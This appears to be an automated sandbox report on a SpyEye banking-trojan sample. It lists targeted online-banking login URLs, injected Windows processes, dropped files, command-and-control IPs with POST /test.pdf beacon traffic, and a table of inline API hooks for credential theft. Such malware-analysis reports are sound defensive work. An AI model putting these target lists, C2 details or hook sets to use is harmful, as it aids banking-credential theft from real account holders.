https://profile.microsoft.com/regsysprofilecenter/default.aspx?lcid=1033 explorer.exe
https://secure.accu.com.au/secureaccu2/ebank.jsp svchost.exe
https://secure.defcredit.com.au/daib/logon/cu3205/logon.asp svchost.exe
https://webbanker.cua.com.au/webbanker/4/cua? svchost.exe
https://www.fmc.com.au/ma svchost.exe
https://www.fmc.com.au/mac/ svchost.exe
https://www.netteller.com.au/802147v47/ntv svchost.exe
https://www1.membersequitybank.com.au/me svchost.exe
- Bank names
String value Source
WINTRUST.dll equals www.wintrust.com (Wintrust Financial Corporation) svchost.exe
https://ibank.b-e.com.au/ibank/ equals www.ibank.com.ph (International Exchange Bank) svchost.exe
https://ibank.b-e.com.au/ibank/login.asp 500 500 20 90 equals www.ibank.com.ph (International Exchange Bank) MDM.EXE
https://ibank.b-e.com.au/ibank/login.asp equals www.ibank.com.ph (International Exchange Bank) svchost.exe
https://ibank.melbcdf.com.au/brisbanemyviewpoint/Login.asp 500 500 20 90 equals www.ibank.com.ph (International Exchange Bank) svchost.exe
https://ibank.melbcdf.com.au/brisbanemyviewpoint/Login.asp equals www.ibank.com.ph (International Exchange Bank) svchost.exe
https://online.westpac.com.au/esis/Login/SrvPage 500 500 20 90 equals www.westpac.com.au (Westpac Banking Corp) svchost.exe
https://online.westpac.com.au/esis/Login/SrvPage equals www.westpac.com.au (Westpac Banking Corp) svchost.exe
ibank.b-e.com.au/ibank/login.asp equals www.ibank.com.ph (International Exchange Bank) svchost.exe
Analysis Overview
+ Startup
  • system is xp
  • SpyEye_binary_62d0915f2d31d0a060671d31419a0b80.exe (PID: 3660 MD5: 62D0915F2D31D0A060671D31419A0B80)
    • explorer.exe (PID: 1636 MD5: 12896823FB95BFB3DC9B46BCAEDC9923)
      • winlogon.exe (PID: 636 MD5: ED0EF0A136DEC83DF69F04118870003E)
      • lsass.exe (PID: 692 MD5: BF2466B3E18E970D8A976FB95FC1CA85)
      • svchost.exe (PID: 892 MD5: 27C6D03BCDB8CFEB96B716F3D8BE3E18)
      • svchost.exe (PID: 968 MD5: 27C6D03BCDB8CFEB96B716F3D8BE3E18)
      • svchost.exe (PID: 1052 MD5: 27C6D03BCDB8CFEB96B716F3D8BE3E18)
      • svchost.exe (PID: 1100 MD5: 27C6D03BCDB8CFEB96B716F3D8BE3E18)
      • svchost.exe (PID: 1144 MD5: 27C6D03BCDB8CFEB96B716F3D8BE3E18)
      • spoolsv.exe (PID: 1496 MD5: 60784F891563FB1B767F70117FC2428F)
      • ctfmon.exe (PID: 1828 MD5: 5F1D5F88303D4A4DBC8E5F97BA967CC3)
      • svchost.exe (PID: 448 MD5: 27C6D03BCDB8CFEB96B716F3D8BE3E18)
      • jqs.exe (PID: 508 MD5: 5E06A9D23727DAF96FAA796F1135FDCD)
      • alg.exe (PID: 1988 MD5: 8C515081584A38AA007909CD02020B3D)
      • wscntfy.exe (PID: 236 MD5: F92E1076C42FCD6DB3D72D8CFE9816D5)
      • msiexec.exe (PID: 724 MD5: 5879D691E842574A20FE63817CB76DF9)
      • wmiprvse.exe (PID: 1120 MD5: 798A9E6828997EEF4517ADA8A2259831)
      • OSE.EXE (PID: 2000 MD5: 7A56CF3E3F12E8AF599963B16F50FB6A)
      • MDM.EXE (PID: 2224 MD5: 11F714F85530A2BD134074DC30E99FCA)
      • svchost.exe (PID: 2264 MD5: 27C6D03BCDB8CFEB96B716F3D8BE3E18)
  • cleanup
+ Dropped Files
File Path MD5
C:\Recycle.Bin\07A49F015E0D693 EC5FBD162A37BF766A414BFA544C74D3
C:\Recycle.Bin\B6232F3AC2C.exe 62D0915F2D31D0A060671D31419A0B80
+ Involved IP Addresses
IP ASN ASN Description ANS State
66.199.227.66 AS15149 EZZI-101-BGP - Access Integrated Technologies, Inc. US
66.199.247.26 AS15149 EZZI-101-BGP - Access Integrated Technologies, Inc. US
195.186.1.121 AS44038 BLUEWIN-AS Swisscom (Schweiz) AG CH
Global Network Data
+ All TCP
Timestamp Source Port Dest Port Source IP Dest IP
Dec 1, 2011 14:59:43.828185081 CET 1079 53 192.168.0.10 66.199.227.66
Dec 1, 2011 14:59:43.828212976 CET 53 1079 66.199.227.66 192.168.0.10
Dec 1, 2011 14:59:43.828391075 CET 1079 53 192.168.0.10 66.199.227.66
Dec 1, 2011 14:59:43.828881025 CET 1079 53 192.168.0.10 66.199.227.66
Dec 1, 2011 14:59:43.828891039 CET 53 1079 66.199.227.66 192.168.0.10
Dec 1, 2011 14:59:43.829310894 CET 1079 53 192.168.0.10 66.199.227.66
Dec 1, 2011 14:59:43.847482920 CET 53 1079 66.199.227.66 192.168.0.10
Dec 1, 2011 14:59:43.847708941 CET 1079 53 192.168.0.10 66.199.227.66
Dec 1, 2011 14:59:52.849962950 CET 1080 80 192.168.0.10 66.199.247.26
Dec 1, 2011 14:59:52.850006104 CET 80 1080 66.199.247.26 192.168.0.10
Dec 1, 2011 14:59:52.850305080 CET 1080 80 192.168.0.10 66.199.247.26
Dec 1, 2011 14:59:52.855242014 CET 1080 80 192.168.0.10 66.199.247.26
Dec 1, 2011 14:59:52.855256081 CET 80 1080 66.199.247.26 192.168.0.10
Dec 1, 2011 14:59:59.520051956 CET 80 1080 66.199.247.26 192.168.0.10
Dec 1, 2011 14:59:59.520442009 CET 1080 80 192.168.0.10 66.199.247.26
Dec 1, 2011 14:59:59.521433115 CET 1080 80 192.168.0.10 66.199.247.26
Dec 1, 2011 14:59:59.521449089 CET 80 1080 66.199.247.26 192.168.0.10
Dec 1, 2011 15:01:29.000931978 CET 1083 80 192.168.0.10 66.199.227.66
Dec 1, 2011 15:01:29.000960112 CET 80 1083 66.199.227.66 192.168.0.10
Dec 1, 2011 15:01:29.001317978 CET 1083 80 192.168.0.10 66.199.227.66
Dec 1, 2011 15:01:29.003742933 CET 1083 80 192.168.0.10 66.199.227.66
Dec 1, 2011 15:01:29.003757954 CET 80 1083 66.199.227.66 192.168.0.10
+ All UDP
Timestamp Source Port Dest Port Source IP Dest IP
Dec 1, 2011 14:59:59.537770033 CET 56090 53 192.168.0.10 195.186.1.121
Dec 1, 2011 14:59:59.537837029 CET 53 56090 195.186.1.121 192.168.0.10
+ HTTP
Timestamp Source Port Dest Port Source IP Dest IP Header
Dec 1, 2011 14:59:52.855242014 CET 1080 80 192.168.0.10 66.199.247.26 POST /test.pdf HTTP/1.1
Content-Type: application/x-www-form-urlencoded
User-Agent: Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 5.1; Trident/4.0; .NET CLR 2.0.50727; .NET CLR 3.0.04506.648; .NET CLR 3.5.21022; .NET CLR 3.0.4506.2152; .NET CLR 3.5.30729)
Host: 66.199.247.26
Content-Length: 256
Cache-Control: no-cache
Dec 1, 2011 15:01:29.003742933 CET 1083 80 192.168.0.10 66.199.227.66 POST /test.pdf HTTP/1.1
Content-Type: application/x-www-form-urlencoded
User-Agent: Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 5.1; Trident/4.0; .NET CLR 2.0.50727; .NET CLR 3.0.04506.648; .NET CLR 3.5.21022; .NET CLR 3.0.4506.2152; .NET CLR 3.5.30729)
Host: 66.199.227.66
Content-Length: 256
Cache-Control: no-cache
Hooks
+ User Modules
+ Hook Summary
Function Name Hook Type Active in Processes
send INLINE jqs.exe, svchost.exe, spoolsv.exe, explorer.exe, lsass.exe, winlogon.exe
TranslateMessage INLINE jqs.exe, svchost.exe, MDM.EXE, spoolsv.exe, explorer.exe, lsass.exe, winlogon.exe
PFXImportCertStore INLINE jqs.exe, svchost.exe, spoolsv.exe, explorer.exe, lsass.exe, winlogon.exe
CryptEncrypt INLINE jqs.exe, svchost.exe, OSE.EXE, MDM.EXE, spoolsv.exe, explorer.exe, lsass.exe, winlogon.exe
ZwVdmControl INLINE jqs.exe, svchost.exe, OSE.EXE, MDM.EXE, spoolsv.exe, explorer.exe, lsass.exe, winlogon.exe
NtResumeThread INLINE jqs.exe, svchost.exe, OSE.EXE, MDM.EXE, spoolsv.exe, explorer.exe, lsass.exe, winlogon.exe
ZwEnumerateValueKey INLINE jqs.exe, svchost.exe, OSE.EXE, MDM.EXE, spoolsv.exe, explorer.exe, lsass.exe, winlogon.exe
ZwResumeThread INLINE jqs.exe, svchost.exe, OSE.EXE, MDM.EXE, spoolsv.exe, explorer.exe, lsass.exe, winlogon.exe
NtVdmControl INLINE jqs.exe, svchost.exe, OSE.EXE, MDM.EXE, spoolsv.exe, explorer.exe, lsass.exe, winlogon.exe
ZwSetInformationFile INLINE jqs.exe, svchost.exe, OSE.EXE, MDM.EXE, spoolsv.exe, explorer.exe, lsass.exe, winlogon.exe
NtEnumerateValueKey INLINE jqs.exe, svchost.exe, OSE.EXE, MDM.EXE, spoolsv.exe, explorer.exe, lsass.exe, winlogon.exe
NtQueryDirectoryFile INLINE jqs.exe, svchost.exe, OSE.EXE, MDM.EXE, spoolsv.exe, explorer.exe, lsass.exe, winlogon.exe
ZwQueryDirectoryFile INLINE jqs.exe, svchost.exe, OSE.EXE, MDM.EXE, spoolsv.exe, explorer.exe, lsass.exe, winlogon.exe
NtSetInformationFile INLINE jqs.exe, svchost.exe, OSE.EXE, MDM.EXE, spoolsv.exe, explorer.exe, lsass.exe, winlogon.exe
ZwClose INLINE wscntfy.exe, svchost.exe, alg.exe, ctfmon.exe, msiexec.exe
NtClose INLINE wscntfy.exe, svchost.exe, alg.exe, ctfmon.exe, msiexec.exe
HttpSendRequestA INLINE explorer.exe, svchost.exe
HttpSendRequestW INLINE explorer.exe, svchost.exe
InternetWriteFile INLINE explorer.exe, svchost.exe
InternetCloseHandle INLINE explorer.exe, svchost.exe
InternetReadFile INLINE svchost.exe
HttpOpenRequestA INLINE svchost.exe
InternetQueryDataAvailable INLINE svchost.exe
InternetReadFileExA INLINE svchost.exe
HttpQueryInfoA INLINE svchost.exe
InternetQueryOptionA INLINE svchost.exe
HttpAddRequestHeadersA INLINE svchost.exe
+ Processes
+ Process: jqs.exe, Module: WS2_32.dll
Function Name Hook Type New Data
send INLINE 0xEB 0xB0 0x01 0x1C 0xC3 0x3E
+ Process: jqs.exe, Module: USER32.dll
Function Name Hook Type New Data
TranslateMessage INLINE 0xEB 0xB0 0x01 0x1C 0xC3 0x3E
+ Process: jqs.exe, Module: CRYPT32.dll
Function Name Hook Type New Data
PFXImportCertStore INLINE 0xEB 0xB0 0x01 0x1C 0xC3 0x3E
+ Process: jqs.exe, Module: ADVAPI32.dll
Function Name Hook Type New Data
CryptEncrypt INLINE 0xEB 0xB0 0x01 0x1C 0xC3 0x3E
+ Process: jqs.exe, Module: ntdll.dll
Function Name Hook Type New Data
ZwVdmControl INLINE 0xEB 0xB0 0x01 0x1C 0xC3 0x3E
NtResumeThread INLINE 0xEB 0xB0 0x01 0x1C 0xC3 0x3E
ZwEnumerateValueKey INLINE 0xEB 0xB0 0x01 0x1C 0xC3 0x3E
ZwResumeThread INLINE 0xEB 0xB0 0x01 0x1C 0xC3 0x3E
NtVdmControl INLINE 0xEB 0xB0 0x01 0x1C 0xC3 0x3E
ZwSetInformationFile INLINE 0xEB 0xB0 0x01 0x1C 0xC3 0x3E
NtEnumerateValueKey INLINE 0xEB 0xB0 0x01 0x1C 0xC3 0x3E
NtQueryDirectoryFile INLINE 0xEB 0xB0 0x01 0x1C 0xC3 0x3E
ZwQueryDirectoryFile INLINE 0xEB 0xB0 0x01 0x1C 0xC3 0x3E
NtSetInformationFile INLINE 0xEB 0xB0 0x01 0x1C 0xC3 0x3E
+ Process: svchost.exe, Module: WS2_32.dll
Function Name Hook Type New Data
send INLINE 0xEB 0xB0 0x01 0x1C 0xC3 0x3E
+ Process: svchost.exe, Module: USER32.dll
Function Name Hook Type New Data
TranslateMessage INLINE 0xEB 0xB0 0x01 0x1C 0xC3 0x3E
+ Process: svchost.exe, Module: ADVAPI32.dll
Function Name Hook Type New Data
CryptEncrypt INLINE 0xEB 0xB0 0x01 0x1C 0xC3 0x3E
+ Process: svchost.exe, Module: ntdll.dll
Function Name Hook Type New Data
ZwVdmControl INLINE 0xEB 0xB0 0x01 0x1C 0xC3 0x3E
NtResumeThread INLINE 0xEB 0xB0 0x01 0x1C 0xC3 0x3E
ZwEnumerateValueKey INLINE 0xEB 0xB0 0x01 0x1C 0xC3 0x3E
ZwResumeThread INLINE 0xEB 0xB0 0x01 0x1C 0xC3 0x3E
NtVdmControl INLINE 0xEB 0xB0 0x01 0x1C 0xC3 0x3E
ZwSetInformationFile INLINE 0xEB 0xB0 0x01 0x1C 0xC3 0x3E
NtEnumerateValueKey INLINE 0xEB 0xB0 0x01 0x1C 0xC3 0x3E
NtQueryDirectoryFile INLINE 0xEB 0xB0 0x01 0x1C 0xC3 0x3E
ZwQueryDirectoryFile INLINE 0xEB 0xB0 0x01 0x1C 0xC3 0x3E
NtSetInformationFile INLINE 0xEB 0xB0 0x01 0x1C 0xC3 0x3E
+ Process: OSE.EXE, Module: ADVAPI32.dll
Function Name Hook Type New Data
CryptEncrypt INLINE 0xEB 0xB0 0x01 0x1C 0xC3 0x3E
+ Process: OSE.EXE, Module: ntdll.dll
Function Name Hook Type New Data
ZwVdmControl INLINE 0xEB 0xB0 0x01 0x1C 0xC3 0x3E
NtResumeThread INLINE 0xEB 0xB0 0x01 0x1C 0xC3 0x3E
ZwEnumerateValueKey INLINE 0xEB 0xB0 0x01 0x1C 0xC3 0x3E
ZwResumeThread INLINE 0xEB 0xB0 0x01 0x1C 0xC3 0x3E
NtVdmControl INLINE 0xEB 0xB0 0x01 0x1C 0xC3 0x3E
ZwSetInformationFile INLINE 0xEB 0xB0 0x01 0x1C 0xC3 0x3E
NtEnumerateValueKey INLINE 0xEB 0xB0 0x01 0x1C 0xC3 0x3E
NtQueryDirectoryFile INLINE 0xEB 0xB0 0x01 0x1C 0xC3 0x3E
ZwQueryDirectoryFile INLINE 0xEB 0xB0 0x01 0x1C 0xC3 0x3E
NtSetInformationFile INLINE 0xEB 0xB0 0x01 0x1C 0xC3 0x3E
+ Process: wscntfy.exe, Module: ntdll.dll
Function Name Hook Type New Data
ZwClose INLINE 0xE9 0x9B 0xBF 0xF3 0x33 0x31
NtClose INLINE 0xE9 0x9B 0xBF 0xF3 0x33 0x31
+ Process: svchost.exe, Module: USER32.dll
Function Name Hook Type New Data
TranslateMessage INLINE 0xEB 0xB0 0x01 0x1C 0xC3 0x3E
+ Process: svchost.exe, Module: CRYPT32.dll
Function Name Hook Type New Data
PFXImportCertStore INLINE 0xEB 0xB0 0x01 0x1C 0xC3 0x3E
+ Process: svchost.exe, Module: ADVAPI32.dll
Function Name Hook Type New Data
CryptEncrypt INLINE 0xEB 0xB0 0x01 0x1C 0xC3 0x3E
+ Process: svchost.exe, Module: ntdll.dll
Function Name Hook Type New Data
ZwVdmControl INLINE 0xEB 0xB0 0x01 0x1C 0xC3 0x3E
NtResumeThread INLINE 0xEB 0xB0 0x01 0x1C 0xC3 0x3E
ZwEnumerateValueKey INLINE 0xEB 0xB0 0x01 0x1C 0xC3 0x3E
ZwResumeThread INLINE 0xEB 0xB0 0x01 0x1C 0xC3 0x3E
NtVdmControl INLINE 0xEB 0xB0 0x01 0x1C 0xC3 0x3E
ZwSetInformationFile INLINE 0xEB 0xB0 0x01 0x1C 0xC3 0x3E
NtEnumerateValueKey INLINE 0xEB 0xB0 0x01 0x1C 0xC3 0x3E
NtQueryDirectoryFile INLINE 0xEB 0xB0 0x01 0x1C 0xC3 0x3E
ZwQueryDirectoryFile INLINE 0xEB 0xB0 0x01 0x1C 0xC3 0x3E
NtSetInformationFile INLINE 0xEB 0xB0 0x01 0x1C 0xC3 0x3E
+ Process: MDM.EXE, Module: USER32.dll
Function Name Hook Type New Data
TranslateMessage INLINE 0xEB 0xB0 0x01 0x1C 0xC3 0x3E
+ Process: MDM.EXE, Module: ADVAPI32.dll
Function Name Hook Type New Data
CryptEncrypt INLINE 0xEB 0xB0 0x01 0x1C 0xC3 0x3E
+ Process: MDM.EXE, Module: ntdll.dll
Function Name Hook Type New Data
ZwVdmControl INLINE 0xEB 0xB0 0x01 0x1C 0xC3 0x3E
NtResumeThread INLINE 0xEB 0xB0 0x01 0x1C 0xC3 0x3E
ZwEnumerateValueKey INLINE 0xEB 0xB0 0x01 0x1C 0xC3 0x3E
ZwResumeThread INLINE 0xEB 0xB0 0x01 0x1C 0xC3 0x3E
NtVdmControl INLINE 0xEB 0xB0 0x01 0x1C 0xC3 0x3E
ZwSetInformationFile INLINE 0xEB 0xB0 0x01 0x1C 0xC3 0x3E
NtEnumerateValueKey INLINE 0xEB 0xB0 0x01 0x1C 0xC3 0x3E
NtQueryDirectoryFile INLINE 0xEB 0xB0 0x01 0x1C 0xC3 0x3E
ZwQueryDirectoryFile INLINE 0xEB 0xB0 0x01 0x1C 0xC3 0x3E
NtSetInformationFile INLINE 0xEB 0xB0 0x01 0x1C 0xC3 0x3E
+ Process: svchost.exe, Module: ntdll.dll
Function Name Hook Type New Data
ZwClose INLINE 0xE9 0x9B 0xBF 0xF3 0x33 0x35
NtClose INLINE 0xE9 0x9B 0xBF 0xF3 0x33 0x35
+ Process: spoolsv.exe, Module: USER32.dll
Function Name Hook Type New Data
TranslateMessage INLINE 0xEB 0xB0 0x01 0x1C 0xC3 0x3E
+ Process: spoolsv.exe, Module: ntdll.dll
Function Name Hook Type New Data
ZwVdmControl INLINE 0xEB 0xB0 0x01 0x1C 0xC3 0x3E
NtResumeThread INLINE 0xEB 0xB0 0x01 0x1C 0xC3 0x3E
ZwEnumerateValueKey INLINE 0xEB 0xB0 0x01 0x1C 0xC3 0x3E
ZwResumeThread INLINE 0xEB 0xB0 0x01 0x1C 0xC3 0x3E
NtVdmControl INLINE 0xEB 0xB0 0x01 0x1C 0xC3 0x3E
ZwSetInformationFile INLINE 0xEB 0xB0 0x01 0x1C 0xC3 0x3E
NtEnumerateValueKey INLINE 0xEB 0xB0 0x01 0x1C 0xC3 0x3E
NtQueryDirectoryFile INLINE 0xEB 0xB0 0x01 0x1C 0xC3 0x3E
ZwQueryDirectoryFile INLINE 0xEB 0xB0 0x01 0x1C 0xC3 0x3E
NtSetInformationFile INLINE 0xEB 0xB0 0x01 0x1C 0xC3 0x3E
+ Process: spoolsv.exe, Module: WS2_32.dll
Function Name Hook Type New Data
send INLINE 0xEB 0xB0 0x01 0x1C 0xC3 0x3E
+ Process: spoolsv.exe, Module: CRYPT32.dll
Function Name Hook Type New Data
PFXImportCertStore INLINE 0xEB 0xB0 0x01 0x1C 0xC3 0x3E
+ Process: spoolsv.exe, Module: ADVAPI32.dll
Function Name Hook Type New Data
CryptEncrypt INLINE 0xEB 0xB0 0x01 0x1C 0xC3 0x3E
+ Process: explorer.exe, Module: USER32.dll
Function Name Hook Type New Data
TranslateMessage INLINE 0xEB 0xB0 0x01 0x1C 0xC3 0x3E
+ Process: explorer.exe, Module: ntdll.dll
Function Name Hook Type New Data
ZwVdmControl INLINE 0xEB 0xB0 0x01 0x1C 0xC3 0x3E
NtResumeThread INLINE 0xEB 0xB0 0x01 0x1C 0xC3 0x3E
ZwEnumerateValueKey INLINE 0xEB 0xB0 0x01 0x1C 0xC3 0x3E
ZwResumeThread INLINE 0xEB 0xB0 0x01 0x1C 0xC3 0x3E
NtVdmControl INLINE 0xEB 0xB0 0x01 0x1C 0xC3 0x3E
ZwSetInformationFile INLINE 0xEB 0xB0 0x01 0x1C 0xC3 0x3E
NtEnumerateValueKey INLINE 0xEB 0xB0 0x01 0x1C 0xC3 0x3E
NtQueryDirectoryFile INLINE 0xEB 0xB0 0x01 0x1C 0xC3 0x3E
ZwQueryDirectoryFile INLINE 0xEB 0xB0 0x01 0x1C 0xC3 0x3E
NtSetInformationFile INLINE 0xEB 0xB0 0x01 0x1C 0xC3 0x3E
+ Process: explorer.exe, Module: WS2_32.dll
Function Name Hook Type New Data
send INLINE 0xEB 0xB0 0x01 0x1C 0xC3 0x3E
+ Process: explorer.exe, Module: CRYPT32.dll
Function Name Hook Type New Data
PFXImportCertStore INLINE 0xEB 0xB0 0x01 0x1C 0xC3 0x3E
+ Process: explorer.exe, Module: WININET.dll
Function Name Hook Type New Data
HttpSendRequestA INLINE 0xEB 0xB0 0x01 0x1C 0xC3 0x3E
HttpSendRequestW INLINE 0xEB 0xB0 0x01 0x1C 0xC3 0x3E
InternetWriteFile INLINE 0xEB 0xB0 0x01 0x1C 0xC3 0x3E
InternetCloseHandle INLINE 0xEB 0xB0 0x01 0x1C 0xC3 0x3E
+ Process: explorer.exe, Module: ADVAPI32.dll
Function Name Hook Type New Data
CryptEncrypt INLINE 0xEB 0xB0 0x01 0x1C 0xC3 0x3E
+ Process: svchost.exe, Module: WS2_32.dll
Function Name Hook Type New Data
send INLINE 0xEB 0xB0 0x01 0x1C 0xC3 0x3E
+ Process: svchost.exe, Module: USER32.dll
Function Name Hook Type New Data
TranslateMessage INLINE 0xEB 0xB0 0x01 0x1C 0xC3 0x3E
+ Process: svchost.exe, Module: ADVAPI32.dll
Function Name Hook Type New Data
CryptEncrypt INLINE 0xEB 0xB0 0x01 0x1C 0xC3 0x3E
+ Process: svchost.exe, Module: ntdll.dll
Function Name Hook Type New Data
ZwVdmControl INLINE 0xEB 0xB0 0x01 0x1C 0xC3 0x3E
NtResumeThread INLINE 0xEB 0xB0 0x01 0x1C 0xC3 0x3E
ZwEnumerateValueKey INLINE 0xEB 0xB0 0x01 0x1C 0xC3 0x3E
ZwResumeThread INLINE 0xEB 0xB0 0x01 0x1C 0xC3 0x3E
NtVdmControl INLINE 0xEB 0xB0 0x01 0x1C 0xC3 0x3E
ZwSetInformationFile INLINE 0xEB 0xB0 0x01 0x1C 0xC3 0x3E
NtEnumerateValueKey INLINE 0xEB 0xB0 0x01 0x1C 0xC3 0x3E
NtQueryDirectoryFile INLINE 0xEB 0xB0 0x01 0x1C 0xC3 0x3E
ZwQueryDirectoryFile INLINE 0xEB 0xB0 0x01 0x1C 0xC3 0x3E
NtSetInformationFile INLINE 0xEB 0xB0 0x01 0x1C 0xC3 0x3E
+ Process: svchost.exe, Module: USER32.dll
Function Name Hook Type New Data
TranslateMessage INLINE 0xEB 0xB0 0x01 0x1C 0xC3 0x3E
+ Process: svchost.exe, Module: WS2_32.dll
Function Name Hook Type New Data
send INLINE 0xEB 0xB0 0x01 0x1C 0xC3 0x3E
+ Process: svchost.exe, Module: ntdll.dll
Function Name Hook Type New Data
ZwVdmControl INLINE 0xEB 0xB0 0x01 0x1C 0xC3 0x3E
NtResumeThread INLINE 0xEB 0xB0 0x01 0x1C 0xC3 0x3E
ZwEnumerateValueKey INLINE 0xEB 0xB0 0x01 0x1C 0xC3 0x3E
ZwResumeThread INLINE 0xEB 0xB0 0x01 0x1C 0xC3 0x3E
NtVdmControl INLINE 0xEB 0xB0 0x01 0x1C 0xC3 0x3E
ZwSetInformationFile INLINE 0xEB 0xB0 0x01 0x1C 0xC3 0x3E
NtEnumerateValueKey INLINE 0xEB 0xB0 0x01 0x1C 0xC3 0x3E
NtQueryDirectoryFile INLINE 0xEB 0xB0 0x01 0x1C 0xC3 0x3E
ZwQueryDirectoryFile INLINE 0xEB 0xB0 0x01 0x1C 0xC3 0x3E
NtSetInformationFile INLINE 0xEB 0xB0 0x01 0x1C 0xC3 0x3E
+ Process: svchost.exe, Module: CRYPT32.dll
Function Name Hook Type New Data
PFXImportCertStore INLINE 0xEB 0xB0 0x01 0x1C 0xC3 0x3E
+ Process: svchost.exe, Module: ADVAPI32.dll
Function Name Hook Type New Data
CryptEncrypt INLINE 0xEB 0xB0 0x01 0x1C 0xC3 0x3E
+ Process: svchost.exe, Module: WININET.dll
Function Name Hook Type New Data
InternetReadFile INLINE 0xEB 0xB0 0x01 0x1C 0xC3 0x3E
HttpOpenRequestA INLINE 0xEB 0xB0 0x01 0x1C 0xC3 0x3E
HttpSendRequestA INLINE 0xEB 0xB0 0x01 0x1C 0xC3 0x3E
HttpSendRequestW INLINE 0xEB 0xB0 0x01 0x1C 0xC3 0x3E
InternetQueryDataAvailable INLINE 0xEB 0xB0 0x01 0x1C 0xC3 0x3E
InternetReadFileExA INLINE 0xEB 0xB0 0x01 0x1C 0xC3 0x3E
HttpQueryInfoA INLINE 0xEB 0xB0 0x01 0x1C 0xC3 0x3E
InternetWriteFile INLINE 0xEB 0xB0 0x01 0x1C 0xC3 0x3E
InternetQueryOptionA INLINE 0xEB 0xB0 0x01 0x1C 0xC3 0x3E
HttpAddRequestHeadersA INLINE 0xEB 0xB0 0x01 0x1C 0xC3 0x3E
InternetCloseHandle INLINE 0xEB 0xB0 0x01 0x1C 0xC3 0x3E
+ Process: alg.exe, Module: ntdll.dll
Function Name Hook Type New Data
ZwClose INLINE 0xE9 0x9B 0xBF 0xF3 0x33 0x30
NtClose INLINE 0xE9 0x9B 0xBF 0xF3 0x33 0x30
+ Process: svchost.exe, Module: ntdll.dll
Function Name Hook Type New Data
ZwClose INLINE 0xE9 0x9B 0xBF 0xF3 0x33 0x30
NtClose INLINE 0xE9 0x9B 0xBF 0xF3 0x33 0x30
+ Process: ctfmon.exe, Module: ntdll.dll
Function Name Hook Type New Data
ZwClose INLINE 0xE9 0x9B 0xBF 0xF3 0x33 0x31
NtClose INLINE 0xE9 0x9B 0xBF 0xF3 0x33 0x31
+ Process: lsass.exe, Module: USER32.dll
Function Name Hook Type New Data
TranslateMessage INLINE 0xEB 0xB0 0x01 0x1C 0xC3 0x3E
+ Process: lsass.exe, Module: ntdll.dll
Function Name Hook Type New Data
ZwVdmControl INLINE 0xEB 0xB0 0x01 0x1C 0xC3 0x3E
NtResumeThread INLINE 0xEB 0xB0 0x01 0x1C 0xC3 0x3E
ZwEnumerateValueKey INLINE 0xEB 0xB0 0x01 0x1C 0xC3 0x3E
ZwResumeThread INLINE 0xEB 0xB0 0x01 0x1C 0xC3 0x3E
NtVdmControl INLINE 0xEB 0xB0 0x01 0x1C 0xC3 0x3E
ZwSetInformationFile INLINE 0xEB 0xB0 0x01 0x1C 0xC3 0x3E
NtEnumerateValueKey INLINE 0xEB 0xB0 0x01 0x1C 0xC3 0x3E
NtQueryDirectoryFile INLINE 0xEB 0xB0 0x01 0x1C 0xC3 0x3E
ZwQueryDirectoryFile INLINE 0xEB 0xB0 0x01 0x1C 0xC3 0x3E
NtSetInformationFile INLINE 0xEB 0xB0 0x01 0x1C 0xC3 0x3E
+ Process: lsass.exe, Module: WS2_32.dll
Function Name Hook Type New Data
send INLINE 0xEB 0xB0 0x01 0x1C 0xC3 0x3E
+ Process: lsass.exe, Module: CRYPT32.dll
Function Name Hook Type New Data
PFXImportCertStore INLINE 0xEB 0xB0 0x01 0x1C 0xC3 0x3E
+ Process: lsass.exe, Module: ADVAPI32.dll
Function Name Hook Type New Data
CryptEncrypt INLINE 0xEB 0xB0 0x01 0x1C 0xC3 0x3E
+ Process: msiexec.exe, Module: ntdll.dll
Function Name Hook Type New Data
ZwClose INLINE 0xE9 0x9B 0xBF 0xF3 0x33 0x30
NtClose INLINE 0xE9 0x9B 0xBF 0xF3 0x33 0x30
+ Process: svchost.exe, Module: ntdll.dll
Function Name Hook Type New Data
ZwClose INLINE 0xE9 0x9B 0xBF 0xF3 0x33 0x31
NtClose INLINE 0xE9 0x9B 0xBF 0xF3 0x33 0x31
+ Process: winlogon.exe, Module: USER32.dll
Function Name Hook Type New Data
TranslateMessage INLINE 0xEB 0xB0 0x01 0x1C 0xC3 0x3E
+ Process: winlogon.exe, Module: ntdll.dll
Function Name Hook Type New Data
ZwVdmControl INLINE 0xEB 0xB0 0x01 0x1C 0xC3 0x3E
NtResumeThread INLINE 0xEB 0xB0 0x01 0x1C 0xC3 0x3E
ZwEnumerateValueKey INLINE 0xEB 0xB0 0x01 0x1C 0xC3 0x3E
ZwResumeThread INLINE 0xEB 0xB0 0x01 0x1C 0xC3 0x3E
NtVdmControl INLINE 0xEB 0xB0 0x01 0x1C 0xC3 0x3E
ZwSetInformationFile INLINE 0xEB 0xB0 0x01 0x1C 0xC3 0x3E
NtEnumerateValueKey INLINE 0xEB 0xB0 0x01 0x1C 0xC3 0x3E
NtQueryDirectoryFile INLINE 0xEB 0xB0 0x01 0x1C 0xC3 0x3E
ZwQueryDirectoryFile INLINE 0xEB 0xB0 0x01 0x1C 0xC3 0x3E
NtSetInformationFile INLINE 0xEB 0xB0 0x01 0x1C 0xC3 0x3E
+ Process: winlogon.exe, Module: WS2_32.dll
Function Name Hook Type New Data
send INLINE 0xEB 0xB0 0x01 0x1C 0xC3 0x3E
+ Process: winlogon.exe, Module: CRYPT32.dll
Function Name Hook Type New Data
PFXImportCertStore INLINE 0xEB 0xB0 0x01 0x1C 0xC3 0x3E
+ Process: winlogon.exe, Module: ADVAPI32.dll
Function Name Hook Type New Data
CryptEncrypt INLINE 0xEB 0xB0 0x01 0x1C 0xC3 0x3E
Analysis File: SpyEye_binary_62d0915f2d31d0a060671d31419a0b80.exe PID: 3660 Parent PID: 3136
+ Sections
+ General
Start time: 05:47:51
Start date: 01/12/2011
Path: C:\SpyEye_binary_62d0915f2d31d0a060671d31419a0b80.exe
Commandline: not known
Imagebase: 0x400000
File size: 254976 bytes
MD5 hash: 62D0915F2D31D0A060671D31419A0B80
File Activities:
+ File opened
File Path Access Options Content overwritten Completion Count Source Address
C:\WINDOWS\system32\kernel32.dll synchronize and generic read synchronous io non alert and non directory file and random access success or wait 3 403AA1
C:\WINDOWS\system32\ntdll.dll read attributes and synchronize and generic read synchronous io non alert and non directory file and random access false success or wait 1 402B90
+ File created
File Path Access Attributes Options Completion Count Source Address
C:\Recycle.Bin\ read data or list directory and synchronize normal directory file and synchronous io non alert and open for backup ident success or wait 1 BD0179
+ File read
File Path Offset Length Value Completion Count Source Address
